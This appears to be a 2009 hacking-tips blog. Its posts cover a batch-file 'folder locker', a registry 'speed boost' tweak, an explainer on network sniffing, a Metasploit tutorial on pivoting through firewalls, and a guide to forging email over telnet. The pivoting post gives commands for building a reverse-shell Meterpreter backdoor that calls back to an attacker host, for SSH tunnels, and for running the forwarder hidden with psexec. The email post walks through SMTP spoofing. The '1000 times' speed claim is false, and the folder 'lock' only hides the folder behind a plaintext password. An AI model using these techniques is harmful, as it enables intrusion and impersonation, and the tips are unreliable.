Thursday, February 19, 2009

Lock Your Folder Through Notepad

Lock Your Folder Through Notepad


Using this technique not only lock your folder but also hide it here it.

Copy and Paste Following code in Notepad:

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

Now do the following steps:

1. Copy above folder into notepad.

2. The text which is written in bold letters delete it & type u r password there.

3. Save that file by extension .bat ( name is u r choice)

4. Now on your screen there is a bat file appear.

5. Double click on that file.

6. You will see the locker folder.

7. Save the files in that folder.

8. Double click on that folder & lock that folder

9. After lock that folder it will become hidden.

10. To open that folder double click on that bat file

11. Type your password & open that folder.

Boost Your Computer Speed 1000 Times


Boost Your Computer Speed One Thousand Times

Step 1.

Theoretically This code will Boost your Computer Speed 1000 Times but in Practically it Boosts the Computer Speed 10 to 20 Times.

First Click on Start -> Run -> Open Notepad and type the below mentioned code or copy and paste the code in Notepad and save it as DisablePaging Executive.reg (.reg Extension) -> Double Click On it a Prompt will open up say that do you add the information into the registry -> click Yes.


Windows Registry Editor Version 5.00

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\MemoryManagement\
"DisablePaging Executive=dword:0"


If You want to Revert the changes Open Notepad and type the below mentioned code or copy and paste the code in Notepad and save it as DisablePaging Executive.reg (.reg Extension) -> Double Click On it a Prompt will open up say that do you add the information into the registry -> click Yes.


Or just type 1 in place of 0 in dword value.


Windows Registry Editor Version 5.00

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\MemoryManagement\
"DisablePaging Executive=dword:1"



Step 2.

(See the ScreenShot)
Go Desktop and Select My Computer right click on Properties -> Select Advanced -> Click on Settings -> Select Advanced -> Click on Change -> Virtual Memory Prompt will open up -> Select No Paging File -> then Click on Set -> Click OK. Now you are all done but don't forget to the Step 2 as it is mandatory.

Monday, February 16, 2009

What is Sniffer and how to detect sniffing in computer network

Sniffing is the electronic form of eavesdropping on the communications that computers transmit across networks. In early networks, the equipment that connected machines allowed every machine on the network to see the traffic of all others. These devices, repeaters and hubs, were very successful in connecting machines, but allowed an attacker easy access to all traffic on the because the attacker only needed to connect to one point to see the entire network’s traffic.


Sniffing is one of the most effective techniques in attacking a wireless network, whether it is mapping the network to gain information, to grab password, or to capture unencrypted data.


Sniffing is a powerful tool in the hands of a hacker. Sniffers usually act as network probes or snoops, examining network traffic but not intercepting or altering it.


How a Sniffer works?

Once a hacker has found possible networks to attack, one of their first tasks is to identify the target. Many organizations are nice enough to include their names or addresses in the network name.


The Sniffer program works by asking a computer, specifically its Network Interface Card (NIC), to stop ignoring all the traffic headed to other computers and pay attention to them. It does this by placing the NIC in a state known as promiscuous mode.

 
Once a NIC is promiscuous mode, a machine can see all the data transmitted on its segment. The program then begins to constantly read all information entering the PC through the network card.


Data traveling along the network comes as frames, or packets, bursts of bits formatted to specific protocols. Because of this strict formatting, the sniffer peels away the layers of encapsulation and decodes the relevant information stored in the packet sent, including the identity of the source computer, that of the targeted computer, and every piece of information exchanged between the two computer.



Even if the network administrator has configured his equipment in such a way as to hide information, there are tools available that can determine this information. Utilizing any well known network sniffing tools, an attacker can easily monitor the unencrypted networks.


Protocols Vulnerable to Sniffing:


Telnet and Re-login: With sniffing, keystrokes of a user can be captured as they are typed, including the user’s username and password. Some tools can capture all text and dump it into a terminal emulator, which can reconstruct exactly what the end user is seeing. This can produce a real time viewer on the remote user’s screen.


HTTP: The default version of HTTP has many loop-holes . Basic authentication is used by many websites, which usually send passwords across the wire in the plain text. Many websites use a technique that prompts the user for a username and password that are sent across the network in the plain text. Data sent is in clear text.


SNMP: SNMP traffic that is SNMPv1 has no good security. SNMP passwords are sent in clear text across the networks.


NNTP: Passwords and data are sent in the clear text across the network.


POP: Passwords and data are sent in the clear text across the network.


FTP: Passwords and data are sent in the clear text across the network.


IMAP: Passwords and data are sent in the clear text across the network.


Passive Vs. Active Sniffing

Sniffers are a powerful piece of software. They have the capability to place the hosting system’s network card into promiscuous mode. A network card in promiscuous mode can receive all the data it can see, not just packets addressed to it.



Passive Sniffing

If you are on a hub, a lot of traffic can potentially be affected. Hubs see all the traffic in that particular collision domain. Sniffing performed on a hub is known as passive sniffing.


Passive sniffing is performed when the user is on a hub. Because the user is on a hub, all traffic is sent to all ports. All the attacker must do is to start the sniffer and just wait for someone on the same collision domain to start sending or receiving data. Collision domain is a logical area of the network in which one or more data packets can collide with each other.


Passive sniffing worked well during the days that hubs were used. The problem is that there are few of these devices left. Most modern networks use switches. That is where active sniffing comes in.


Active Sniffing

When sniffing is performed on a switched network, it is known as active sniffing.


Active sniffing relies on injecting packets into the network that causes traffic. Active sniffing is required to bypass the segmentation that switches provided. Switches maintain their own ARP cache in a special type of memory known as Content Addressable Memory (CAM), keeping track of which host is connected to which port.


Sniffers operate at the Data Link layer of the OSI model. This means that they do not have to play by the same rules as applications and services that reside further up the stack. Sniffers can grab whatever they see on the wire and record it for later review. They allow the user to see all the data contained in the packet, even information that should remain hidden.


The terms active and passive sniffing has also been used to describe wireless network sniffing. They have analogous meaning. Passive wireless sniffing involves sending no packets, and monitoring the packets send by the others. Active sniffing involves sending out multiple network probes to identify APs.


Protecting Against Sniffing & Eavesdropping

Now wired networks upgrade from repeaters and hubs to switched environment. These switches would send only the traffic intended for a specific host over each individual port, making it to difficult to sniff the entire network’s traffic but unfortunately this is not an option for wireless networks due to the nature of wireless communications.


The only way to protect wireless users from attackers who might be sniffing is to utilize encrypted sessions wherever possible:

SSL for e-mail connection, SSH instead of Telnet, and Secure Copy (SCP) instead of File Transfer Protocol (FTP).



To protect a network from being discovered with sniffing tools, it is important to turn off any network identification broadcasts and if possible, close down the network to any unauthorized users.


Detecting a Sniffer


Sniffers are a major source of contemporary attacks. The “ifconfig” command is used to detect if a sniffer has been installed.


The “ifconfig” command displays the current configuration of your network interface. Most Ethernet adaptors are configured to accept only messages intended for them. An attacker must set a computer’s adaptor to “promiscuous mode,” in order to listen to (and record) everything on its segment of the Ethernet.


Antisniff, that scans networks to determine if any NICs are running in promiscuous mode. These detection tools should run regularly, since they act as an alarm of sorts, triggered by evidence of a sniffer.


Promqry 1.0, developed by Tim Rains at Microsoft can be used in identifying Sniffers. According to Tim Rains many network sniffer detection tools rely on bugs in the operating system and sniffer behavior for their discovery work. Promqry is different in that it can query systems to learn if any have a network interface operating in promiscuous mode, which as you know is a mode commonly use by network sniffing software. A command line version and a version with a GUI of Promqry 1.0 is available at Microsoft’s site.

Saturday, February 14, 2009

Bypassing Firewalls Using Metaplsoit & Port Forwarding

Many times while doing penetration testing, pen testers face great problems like while trying to  gain access to internal network systems(legally) & services while you have began your attack from outer secure boundary of target network : Rule-sets of a Firewall.



Well I have assumed that you have already gained access to at least one host which is linked to the internal network, you know there are many other systems there inside and certainly there would be many interesting services you would like play with :D.


The only problem arises is that you can not access them through internet and gained shell is not powerful enough to let you do all of your post-exploitation tasks through it. So you should look for a way to get rid of this limitation and freely browse and probe internal network, So called reverse shells may be your first try, but they are usually too simple and not powerful enough for what we`re going to do.


Well we will review some effective ways of doing so, in different situations. As a network administrator, you will see that how opening even one single port in your outbound ACL can put your whole internal network at sever risk we will learn that too.

 
So first of all, We will learn about: What is Port  Forwarding is ?

Consider host A, host B in middle and host C. Host A should connect to host C in order to do something, but for any reason it`s not possible, but host B can directly connect to C. If we use host B in middle, to get connection stream from A and pass it to B while taking care of connection , we say host B is doing port-forwarding. Assuming the whole forwarding is happening to gain access to SSH on host C, this is how it`s happening from tcp/ip point of view:


Host B runs a software/service/wrapper that opens a listening socket ( tcp/20 for example) and wait for incoming connections. Host C ( real ssh-server) is also listening to 22/tcp. Running software on B is defined to pass any incoming connection on opened port to host C and on port 22/tcp. So if host A connect to 22/tcp of B, sent packets to this port are automatically relayed to C, port 22/tcp.

Right like many other terms used in attacks , port-forwarding is also divided into normal port-forwarding and reverse ( remote ) port forwarding . Above A B C sample was normal one .

In reverse port-forwarding , the case is again preparing connection between A & C through B. But this time it`s C who begin the connection. In a flat network design both of these can be same, but if you place host A in internet, host C in deep protected zones of internal network and host B at boarder of protected network, things change a little bit.

Fpipe , WinRelay & DataPipe.exe are 3 Freeware(Free) and easy to use tools that are designed to do simple port-forwarding. Let`s use fpipe.exe to implement above mentioned scenario and quickly move to more advanced techniques. We will run fpipe.exe with below parameters on host B and host A have to ssh to host B. Now fpipe.exe will handle incoming connection ( -l 22 ) and pass it to remote host and defined port ( -r 22 host-c ). Nothing strange nor its quite easy to understand.



fpipe.exe -l 22 -r 22 host-C


So, let`s make scenario more real-world. What if even host B is behind firewall and no chance to open any port ? what if we can`t even send a single packet to host B, while host B is the only system in network which is allowed to connect to C ?  Oh, this looks a hard scenario, but the fact its not really so hard. In this scenario it`s also considered that host C ( final destination) is not allowed to send any packet to internet but host B is allowed to send packets to internet, only if destination port is 53. I don`t mind how you may have compromised host B at all. You may have done so by exploiting a client-side vulnerability on it and got back your reverse-shell at response.


In this such situation, tools like fpipe.exe will not help you much. Since we already have a negotiated connection between A and B we should it in most effective way because if we loose this connection before stabilizing our access (with a reverse-connecting trojan for example), we have to re-exploit the target which is not always possible.


For win32 targets, my favorite tool-set to bypass the firewall and get into internal network is Metasploit with Meterpreter loaded as payload of exploit. Even if we are  not using one of MSF exploits to gain access, We use 'msfpayload' withing the framework to generate a raw binary output of Meterpreter and use it as a single executable trojan.


What make Meterpreter a great post-exploitation tool for this case , is it`s port-forwarding capability . It`s great becase :
  • Meterpreter do NOT open any new connection between you (host A) and B, beside it`s negotiated session. All new communication channels are encapsulated in current session.
  • You can define multiple forwarding rules over a single Meterpreter session.
  • You can view/add/remove forwarding rules as you go while it`s running .
  • you can do many other things with Met. while port-forwarding is handled in background.
  • Finally , you can directly exploit host C if Meterpreter is used within the framework, like when it`s load after successfully exploitng something.

    If you just want to use benefits of Meterpreter , and have your own exploit ready , here`s how to generate the executable payload for being executed on host B :


    msfpayload windows/meterpreter/reverse_tcp LPORT=53 LHOST=1.2.3.4 EXITFUNC=thread X > met-reverse-backdoor.exe


    I think the syntax is clear enough. LHOST have the IP of host A, where backdoor will connect to . LPORT is the port backdoor connects to , on host A . I used 53 because this port is usually not filtered on firewalls. Now you should transfer met-reverse-backdoor.exe to host B and get ready to execute it.


    Since this is not a normal payload and is an advanced multi-stage payload we should use it`s specific handler/client which is available in Metasploit . Let`s run the meterpreter handler. Launch the metasploit console & then :

    msf > use exploit/multi/handler 
     
    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp


    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(handler) > set LPORT 53

    LPORT => 53


    msf exploit(handler) > exploit


    [*] Started reverse handler


    [*] Starting the payload handler...



    Now you`re ready to execute built .exe on host B. after that, you will see incoming connection on console, let the payload completely load and alert about opened session .

    'portfwd' is the meterpreter command we will work with. Try it without any parameter to get help and read meterpreter documentations for farther info and details.

    Let`s assume we want to connect to terminal-service on host C, directly from host A . With help of Port-Forwarding of Meterpreter, it`s matter of a command. In metasploit, console run :

    portfwd -a -L 127.0.0.1 -l 444 -h {IP of host C here} -p 3389


    Let me explain above command if it`s not clear.

    with (-a) we Add a new port-forwarding rule.

    (-L) defines the IP address to bind forwarded socket to. Since we are running these all on host A and want to continue work from the same host, we set 127.0.0.1 . If host A have multiple IPs and you want to bind to specific IP, you can set it here.

    (-l) is the port number which will be opened on host A , for accepting incoming connections. it can be any free port on your system .

    (-h) defines the IP address of host C, or any other host withing the internal network .

    (-p) The port you want to connect to, on host C. Since we are going to use terminal-service, it`s 3389.

    Now on host A , try to connect to terminal service through forwarded socket . to do so from console :

    c:\>mstsc.exe /v:127.0.0.1:444

    Congratulations . You`ve successfully bypassed firewall and got your reverse-connection terminal service session.

    Same steps can be used for almost any TCP service. Unfortunately UDP services are not supported in Meterpreter .

    But Yes, We have mentioned directly exploiting internal hosts from host A. Does it mean for every service we are going to exploit, we should define a forwarding rule ? no.


    Metasploit have a nifty option (command) called 'route'. While you`re in Meterpreter session if you ask for help you`ll see a 'route' command , but this is not our one. After met. session successfully loaded ( first opened session will be named as '1' ) , in console press Ctrl-z . This will get you back to Metasploit console , while keeping the meterpreter session open in background .
    Run below command to confirm availability of session :


    msf exploit(handler) > sessions -l

    Active sessions
    ===============

    Id Description Tunnel
    -- ----------- ------
    1 Meterpreter 127.0.0.1:53 -> 1.2.3.4:1913


    Now type 'route' and check given help for syntax . Yes, this is what I was talking .


    msf exploit(handler) > route
     
    Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid]

    Route traffic destined to a given subnet through a supplied session.
    The default comm is Local.
    Our targeted internal network uses 10.10.0.1/24 network addressing. Host C internal IP is 10.10.0.5 . We want to exploit host D with IP address 10.10.0.6 . The lame way is to define a port-forwarding rule in met. , and send exploit payload to 127.0.0.1:{defined port} like what we did for terminal-service. But the better way is using 'route' :


    msf exploit(handler) > route add 10.10.0.1 255.255.255.0 1

    msf exploit(handler) > route print

    Active Routing Table
    ====================

    Subnet Netmask Gateway
    ------ ------- -------
    10.10.0.1 255.255.255.0 Session 1

    msf exploit(handler) >



    Above means we`ve successfully added the route and what it means to Metasploit ?
    It means that any time you set RHOST in any of you exploits in framework that match this routing rule the exploit will be routed automatically by meterpreter to it`s destination network, transparently . Now to exploit 10.10.0.6 (host D), all you have to do is '>set RHOST 10.10.0.6' in framework . All greetz goes for HD Moore and Skape for preparing such a Awesome framework :)



    Two other third-party tools that we have used are mentioned below:

    SocketNinja.pl, Its a old part of Metasploit ( 2.x ) branch which is a pretty useful tool for this purpose IMO. You can get it from here , and read more about it here. It was my favorite pivoting tool for a while.


    Reverse Proxy Multi-threading Engine by Team 514 guys, which can be assumed as a stand-alone clone of Meterpreter port-forwarding. While being pretty cool and poweful tool, I didn`t found the code-base stable enough for hardcore works or heavy duty jobs, and code needs optimization. Test it in your labs before using it in real-world missions.



    Port-Forwarding Second Part
     
    In this part we will explain how to do port-forwarding trick with ssh, without any special third-party tool but the ssh client.


    We will talk about what Port-Forwarding is and how we can use simple tools to do that . Then we introduce to you some interesting features of Metasploit and it`s Meterpreter payload to implement Port-Forwarding in a more advanced way and finally how to use pivoting capabilities of Metasploit .


    This time I`m going to discuss the same concept , but with using usual operating-system capabilities , among few not-hackers-specific tools like an ssh server/client .

    If you remember part 1 , you saw that we used a raw meterpreter payload output ( anexecutable ) to connect a host withing internal protected network to our host in internet , and piggy back that connection to jump into firewalled network . While that feature of meterpreter looks exciting , that`s a hacker-friendly clone of a well known SSH feature with same 'port-forwarding' name . How ever , in order to use ssh in the same way as meterpreter , we should use another option as known as 'remote port forwarding' , or what we called 'reverse' port forwarding. Let`s see how these two work . Before begining , remember same A,B,C host example where :


    Normal port forwarding with SSH: This is well known option. It means we use a SSH server installed on host B , to connect to host C or any other internal host. In this scenario, at least one dual-home ssh server should be there in protected network, and dual-home means B`s SSH daemon should be accessible from internet and be able to browse internal network too. 
    Here`s how we use SSH client/servers to implement. I usually use PUTTY package as ssh client for windows. In case the only usage is port-forwarding, I use plink.exe from this package for reasons you`ll later know. I`ll follow same terminal-service example. Host C runs TS and we want host B to forward us to it :


    On host A: plink.exe {host-B} -P 22 -C -L 127.0.0.1:444:{host-C}:3389 -l username -pw password

    Where: {host-b} -P 22 is IP and port of SSH on the host located at boarder of network. -C force compression. in most cases great performance increase, but if you only forward binary and already-compressed protocols, skip it.

    -L 127.0.0.1:444:{host-C}:3389 means , we want normal port-forwarding ( -L ) . First colored part tells that start point of tunnel will be binded on 127.0.0.1 interface on our host ( A ) and listen on port 444 . So everything is sent to 127.0.0.01:444 will be forwaeded to end of tunnel . Second colored part represents end point of tunnel where our forwarded data will be sent to . Since we want to connect to terminal-service on host C , we used that . Mentioning '127.0.0.1' is optional and you can skip it , unless you wan to bind the socket to a specific interface on your system . In such case you should use IP of that interface.

    -l and -pw are obvious and the main reason we use plink.exe and not putty.exe for example or any other common client. plink.exe accepts user/pass as a switch but other clients do not. In cases you should launch forwarder in background or you don`t have interactive shell access, this comes pretty useful. Cause other clients requre interactive shell to enter password, unless you use cert-based authentication which have it`s own problems.


    After successful negotiation, you can use same 'mstsc.exe 127.0.0.1:444' to connect to TS on host C. That`s it.


    There`s another way to do normal port-forwarding with SSH too and that`s Dynamic forwarding . Dynamic port-forwarding is nothing but a SOCKS v4 over SSH session. It means you use SSH server as SOCKS server to browse internal network hosts. This is pretty useful while you simply want to browse web-pages hosted there. off-course socks-enabled programs can be used with this too. Here`s how to start it:


    plink.exe {host-B} -P 22 -C -D 8888 -l username -pw password


    -D starts the Dynamic port forwarding feature, AKA SOCKS. Above will make your ssh client a simple socks server which listen to port 8888 for incoming connections . Nothing complex to explain .
    To learn more about ssh port forwarding , you can read this.


    Remote port forwarding : This is the more cool feature , or what we`re going to actually use . Since it`s not usually possible to find a open ssh server on target network ( unless it`s lame target) normal forwarding would not be a possible scenario . Here`s where 'remote' port-forwarding comes handy . I`m not going to re-document this feature of ssh , you can ask Google for details . But I`ll just briefly explain how it should be used for our case , among few important notes and tricks.

    In remote port-forwarding , the start point of tunnel will be on ssh-server , rather than own client , and the end of tunnel will be the host running ssh-client . In other words , In this scenario , host B runs the ssh-client and connect to a ssh-server outside of protected network . Then a port will be opened on ssh-server and anything sent to ssh-server on that port , will be forwarded to specified destination ( host C in our case ).

    Noticed the difference ? yes, this way attacker does not need to be able to ssh to any host in protected network . No ssh-server in protected network is even necessary . All we have to be able to execute inside protected network , is a ssh-client, plink.exe as an example. Let`s try this:


    We are Assuming that
    • We have a ssh-server under our control, running on our own host {host-A} or any server in internet.
    • ssh server is configured to allow Remote Port Forwarding. This is the case only for OpenSSH running on *nix.
    • We have prepared a account which is permitted for doing 'remote' port forwarding. Usually only high privileged users (root) have this.
    • At least one host (host B) in protected network , have at least one open port in ACL of firewall to be able to connect to servers outside of network. Wise admins usually block all outgoing connections , so 53 maybe your lucky number again.

    • SSH server is listening on same port as above . So if only 53/tcp is allowed for outgoing , our ssh-server should be listening on same port .

    We`ll run below command on host B:


    plink.exe {host-A} -P 53 -C -R 127.0.0.1:444:{host-C}:3389 -l username -pw password


    -R 127.0.0.1:444:{host-C}:3389 is the switch start remote forwarding where first colored part specifies start point of tunnel , and second colored part represents end point of tunnel . If you want to connect to tunnel entry point (port 444) on same host as ssh-server, you can again skip 127.0.0.1:444 and use '-R 444:{host-C}:3389'. If ssh-server is running another host, say a zombie host, you should exactly specify IP address of interface you want to bind socket to. So if ssh-server is running on 1.2.3.4 , you should use '-R 1.2.3.4:444:{host-C}:3389'.

    Another important note is that , by default ssh-server accepts connections to remote forwarded port (444) only from local-host. So check configuration of your client/server on how to config that in correct way . In putty.exe this should be specified with a check mark as below. RTFM for how to do this on your favorite ssh client .


    With above option allowed , now you can remotely connect to ssh-server on port 444 and get redirected to internal network and host C on port 3390 . Without that option , it would be possible to connect to port 444 only from the same host as ssh-server .That`s it ! Welcome to internal network .

    Few other tips :
    It`s not necessary to have a dedicated server for lunching ssh-server . If you`re running linux , all you have to do is to configure and start sshd . If you`re running windows, you can get a copy of Bitvise WinSSHD and setup it.




    Since you`re leacing user/pass of your ssh-server on targeted host, be warned that you`re leaking a high privilege account there ! So , disable shell for that specific account so if a smart admin tried to back trace you , he won`t be able to instantly own your box . I`ve seen this really happened. Changing password of that account after each connection is another solution BESIDE this.



    To run the forwarder ( ssh client , plink.exe for example ) running in background, you can use PsEXEC to execute it hidden in background and with system privileges so it`s not killed by user:


    psexec.exe -s -d plink.exe "plink parameters here"



    I hope you guys have learn a bit with this technique :), comments are welcome.

    Ethical Hacking through Windows XP for Computer Security

    Ethical Hacking through Windows XP for Computer Security

    Part I: The Magic of DOS
    In this guide you will learn how to telnet , forge email, use
    nslookup and netcat with Windows XP.
    So you have the newest, glitziest, "Fisher Price" version of Windows: XP. How can you use XP in a way that sets you apart from the boring millions of ordinary users?
    ****************
    Luser Alert: Anyone who thinks this GTMHH will reveal how to blow up people's TV sets and steal Sandra Bullock's email is going to find out that I won't tell them how.
    ****************
    The key to doing amazing things with XP is as simple as D O S. Yes, that's right, DOS as in MS-DOS, as in MicroSoft Disk Operating System. Windows XP (as well as NT and 2000) comes with two versions of DOS. Command.com is an old DOS version. Various versions of command.com come with Windows 95, 98, SE, ME, Window 3, and DOS only operating systems.
    The other DOS, which comes only with the XP, 2000 and NT operating systems, is cmd.exe. Usually cmd.exe is better than command.com because it is easier to use, has more commands, and in some ways resembles the bash shell in Linux and other Unix-type operating systems. For example, you can repeat a command by using the up arrow until you back up to the desired command. Unlike bash, however, your DOS command history is erased whenever you shut down cmd.exe. The reason XP has both versions of DOS is that sometimes a program that won?t run right in cmd.exe will work in command.com
    ****************
    Flame Alert: Some readers are throwing fits because I dared to compare DOS to bash. I can compare cmd.exe to bash if I want to. Nanny nanny nah nah.
    ****************
    DOS is your number one Windows gateway to the Internet, and the open sesame to local area networks. From DOS, without needing to download a single hacker program, you can do amazingly sophisticated explorations and even break into poorly defended computers.
    ****************
    You can go to jail warning: Breaking into computers is against the law if you do not have permission to do so from the owner of that computer. For example, if your friend gives you permission to break into her Hotmail account, that won't protect you because Microsoft owns Hotmail and they will never give you permission.
    ****************
    ****************
    You can get expelled warning: Some kids have been kicked out of school just for bringing up a DOS prompt on a computer. Be sure to get a teacher's WRITTEN permission before demonstrating that you can hack on a school computer.
    ****************
    So how do you turn on DOS?
    Click All Programs -> Accessories -> Command Prompt
    That runs cmd.exe. You should see a black screen with white text on it, saying something like this:
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    C:\>
    Your first step is to find out what commands you can run in DOS. If you type "help" at the DOS prompt, it gives you a long list of commands. However, this list leaves out all the commands hackers love to use. Here are some of those left out hacker commands.
    TCP/IP commands:
    telnet
    netstat
    nslookup
    tracert
    ping
    ftp
    NetBIOS commands (just some examples):
    nbtstat
    net use
    net view
    net localgroup
    TCP/IP stands for transmission control protocol/Internet protocol. As you can guess by the name, TCP/IP is the protocol under which the Internet runs. along with user datagram protocol (UDP). So when you are connected to the Internet, you can try these commands against other Internet computers. Most local area networks also use TCP/IP.
    NetBIOS (Net Basic Input/Output System) protocol is another way to communicate between computers. This is often used by Windows computers, and by Unix/Linux type computers running Samba. You can often use NetBIOS commands over the Internet (being carried inside of, so to speak, TCP/IP). In many cases, however, NetBIOS commands will be blocked by firewalls. Also, not many Internet computers run NetBIOS because it is so easy to break in using them. We will cover NetBIOS commands in the next Guide to XP Hacking.

    How to Telnet with Windows XP
    The queen of hacker commands is telnet. To get Windows help for
    telnet, in the cmd.exe window give the command:
    C:\>telnet /?
    Here's what you will get:
    telnet [-a][-e escape char][-f log file][-l user][-t term][host
    [port]]
    -a Attempt automatic logon. Same as -l option except uses
    the currently logged on user's name.
    -e Escape character to enter telnet client prompt.
    -f File name for client side logging
    -l Specifies the user name to log in with on the remote system.
    Requires that the remote system support the TELNET ENVIRON
    option.
    -t Specifies terminal type.
    Supported term types are vt100, vt52, ansi and vtnt only.
    host Specifies the hostname or IP address of the remote computer
    to connect to.
    port Specifies a port number or service name.
    ****************
    Newbie note: what is a port on a computer? A computer port is sort of like a seaport. It's where things can go in and/or out of a computer. Some ports are easy to understand, like keyboard, monitor, printer and modem. Other ports are virtual, meaning that they are created by software. When that modem port of yours (or LAN or ISDN or DSL) is connected to the Internet, your computer has the ability to open or close any of over 65,000 different virtual ports, and has the ability to connect to any of these on another computer - if it is running that port, and if a firewall doesn?t block it.
    ****************
    ****************
    Newbie note: How do you address a computer over the Internet? There are two ways: by number or by name.
    ****************
    The simplest use of telnet is to log into a remote computer. Give the
    command:
    C:/>telnet targetcomputer.com (substituting the name of the computer you want to telnet into for targetcomputer.com)
    If this computer is set up to let people log into accounts, you may
    get the message:
    login:
    Type your user name here, making sure to be exact. You can't swap between lower case and capital letters. For example, user name Guest is not the same as guest.
    ****************
    Newbie note: Lots of people email me asking how to learn what their user name and password are. Stop laughing, darn it, they really do. If you don't know your user name and password, that means whoever runs that computer didn't give you an account and doesn't want you to log on.
    ****************
    Then comes the message:
    Password:
    Again, be exact in typing in your password.
    What if this doesn't work?
    Every day people write to me complaining they can't telnet. That is
    usually because they try to telnet into a computer, or a port on a
    computer that is set up to refuse telnet connections. Here's what it
    might look like when a computer refuses a telnet connection:
    C:\ >telnet 10.0.0.3
    Connecting To 10.0.0.3...Could not open connection to the host, on port 23. A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.
    Or you might see:
    C:\ >telnet techbroker.com
    Connecting To techbroker.com...Could not open connection to the host, on port 23.
    No connection could be made because the target machine actively
    refused it.
    If you just give the telnet command without giving a port number, it
    will automatically try to connect on port 23, which sometimes runs a
    telnet server.
    **************
    Newbie note: your Windows computer has a telnet client program,
    meaning it will let you telnet out of it. However you have to install
    a telnet server before anyone can telnet into port 23 on your
    computer.
    *************
    If telnet failed to connect, possibly the computer you were trying to
    telnet into was down or just plain no longer in existence. Maybe the
    people who run that computer don't want you to telnet into it.
    How to Telnet into a Shell Account
    Even though you can't telnet into an account inside some computer, often you can get some information back or get that computer to do something interesting for you. Yes, you can get a telnet connection to succeed -without doing anything illegal --against almost any computer, even if you don't have permission to log in. There are many legal things you can do to many randomly chosen computers with telnet. For example:
    C:/telnet freeshell.org 22
    SSH-1.99-OpenSSH_3.4p1
    That tells us the target computer is running an SSH server, which enables encrypted connections between computers. If you want to SSH into an account there, you can get a shell account for free at
    . You can get a free SSH client program from
    .
    One reason most hackers have shell accounts on Internet servers is because you can meet the real hackers there. When you've logged in, give the command w or who. That gives a list of user names. You can talk to other users with tht talk command. Another fun thing, if your shell account allows it, is to give the command
    ps -auxww
    It might tell you what commands and processes other users are running. Ask other users what they are doing and they might teach you something. Just be careful not to be a pest!
    ***************
    You can get punched in the nose warning: Your online provider might kick you off for making telnet probes of other computers. The solution is to get a local online provider and make friends with the people who run it, and convince them you are just doing harmless, legal explorations.
    *************
    Sometimes a port is running an interesting program, but a firewall won't let you in. For example, 10.0.0.3, a computer on my local area network, runs an email sending program, (sendmail working together with Postfix, and using Kmail to compose emails). I can use it from an account inside 10.0.0.3 to send emails with headers that hide from where I send things.
    If I try to telnet to this email program from outside this computer,
    here's what happens:
    C:\>telnet 10.0.0.3 25
    Connecting To 10.0.0.3...Could not open connection to the host, on
    port 25.
    No connection could be made because the target machine actively
    refused it.
    However, if I log into an account on 10.0.0.3 and then telnet from
    inside to port 25, here's what I get:
    Last login: Fri Oct 18 13:56:58 2002 from 10.0.0.1
    Have a lot of fun...
    cmeinel@test-box:~> telnet localhost 25
    Trying ::1...
    telnet: connect to address ::1: Connection refused
    Trying 127.0.0.1... [Carolyn's note: 127.0.0.1 is the numerical
    address meaning localhost, the same computer you are logged into]
    Connected to localhost.
    Escape character is '^]'.
    220 test-box.local ESMTP Postfix
    The reason I keep this port 25 hidden behind a firewall is to keep
    people from using it to try to break in or to forge email. Now the
    ubergeniuses reading this will start to make fun of me because no
    Internet address that begins with 10. is reachable from the Internet.
    However, sometimes I place this "test-box" computer online with a
    static Internet address, meaning whenever it is on the Internet, it
    always has the same numerical address. I'm not going to tell you what its Internet address is because I don't want anyone messing with it. I just want to mess with other people's computers with it, muhahaha. That's also why I always keep my Internet address from showing up in the headers of my emails.
    ***************
    Newbie note: What is all this about headers? It's stuff at the
    beginning of an email that may - or may not - tell you a lot about
    where it came from and when. To see full headers, in Outlook click
    view -> full headers. In Eudora, click the "Blah blah blah" icon.
    ****************

    How to Forge Email with Windows XP Telnet
    Want a computer you can telnet into and mess around with, and not get into trouble no matter what you do to it? I've set up my
    techbroker.com (206.61.52.33) with user xyz, password guest for you to play with. Here's how to forge email to xyz@techbroker.com using
    telnet. Start with the command:
    C:\>telnet techbroker.com 25
    Connecting To Techbroker.com
    220 Service ready
    Now you type in who you want the message to appear to come from:
    helo santa@techbroker.com
    Techbroker.com will answer:
    250 host ready
    Next type in your mail from address:
    mail from:santa@techbroker.com
    250 Requested mail action okay, completed
    Your next command:
    rcpt to:xyz@techbroker.com
    250 Requested mail action okay, completed
    Your next command:
    data
    354 Start main input; end with .
    Newbie note: just means hit return. In case you can't see that little period between the s, what you do to end composing your email is to hit enter, type a period, then hit enter again.
    Anyhow, try typing:
    This is a test.
    .
    250 Requested mail action okay, completed
    quit
    221 Service closing transmission channel
    Connection to host lost.
    Using techbroker's mail server, even if you enable full headers, the
    message we just composed looks like:
    Status: R
    X-status: N
    This is a test.
    That's a pretty pathetic forged email, huh? No "from", no date.
    However, you can make your headers better by using a trick with the data command. After you give it, you can insert as many headers as you choose. The trick is easier to show than explain:
    220 Service ready
    helo santa@northpole.org
    250 host ready
    mail from:santa@northpole.com
    250 Requested mail action okay, completed
    rcpt to:
    250 Requested mail action okay, completed
    data
    354 Start main input; end with .
    from:santa@deer.northpole.org
    Date: Mon, 21 Oct 2002 10:09:16 -0500
    Subject: Rudolf
